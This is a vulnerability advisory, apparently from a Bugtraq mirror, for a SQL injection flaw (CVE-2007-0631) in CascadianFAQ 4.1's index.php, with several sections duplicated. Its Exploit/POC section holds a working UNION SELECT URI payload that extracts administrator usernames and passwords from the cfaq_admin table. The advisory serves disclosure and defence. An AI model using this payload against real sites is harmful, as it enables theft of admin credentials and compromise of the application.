CascadianFaq Index.PHP SQL Injection Vulnerability
BID:22314
Info
CascadianFaq Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 22314 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0631 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
Eclectic Designs CascadianFAQ 4.1 |
| Not Vulnerable: | |
Discussion
CascadianFaq Index.PHP SQL Injection Vulnerability
CascadianFAQ is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 4.1; earlier versions may also be vulnerable.
CascadianFAQ is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 4.1; earlier versions may also be vulnerable.
Exploit / POC
CascadianFaq Index.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*
Solution / Fix
CascadianFaq Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CascadianFaq Index.PHP SQL Injection Vulnerability
References:
References:
- CascadianFAQ Homepage (Eclectic Designs)